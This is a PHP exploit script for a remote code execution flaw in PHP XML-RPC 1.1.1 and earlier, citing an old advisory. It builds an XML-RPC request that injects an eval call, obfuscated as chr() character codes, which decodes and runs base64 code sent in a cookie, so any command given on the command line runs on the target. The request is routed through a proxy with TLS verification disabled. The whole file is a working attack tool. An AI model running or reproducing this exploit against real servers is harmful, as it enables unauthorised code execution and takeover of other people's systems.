<?php
/**
 * PHP XML-RPC <= 1.1.1 remote code execution
 * original advisory: http://www.hardened-php.net/advisory_152005.67.html
 */
$url = 'http://target.ru/server.php';
$proxy = 'localhost:8118';

$code = $argv[1];
if(!$code) {
    echo 'Sample use:
        '.$argv[0].' "echo `ls -al`;"
    ';
    exit;
}
$cookie = 'x='.base64_encode($code.';');
$post_data = '<param><value><name><name>.eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101).chr(40).chr(36).chr(95).chr(67).chr(79).chr(79).chr(75).chr(73).chr(69).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(41).chr(59))));exit;//</name></name></value></param>';
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_PROXY, $proxy);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($c, CURLOPT_COOKIE, $cookie);
curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-Type: text/xml'));
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_HEADER, false);
echo curl_exec($c);
curl_close($c);
?>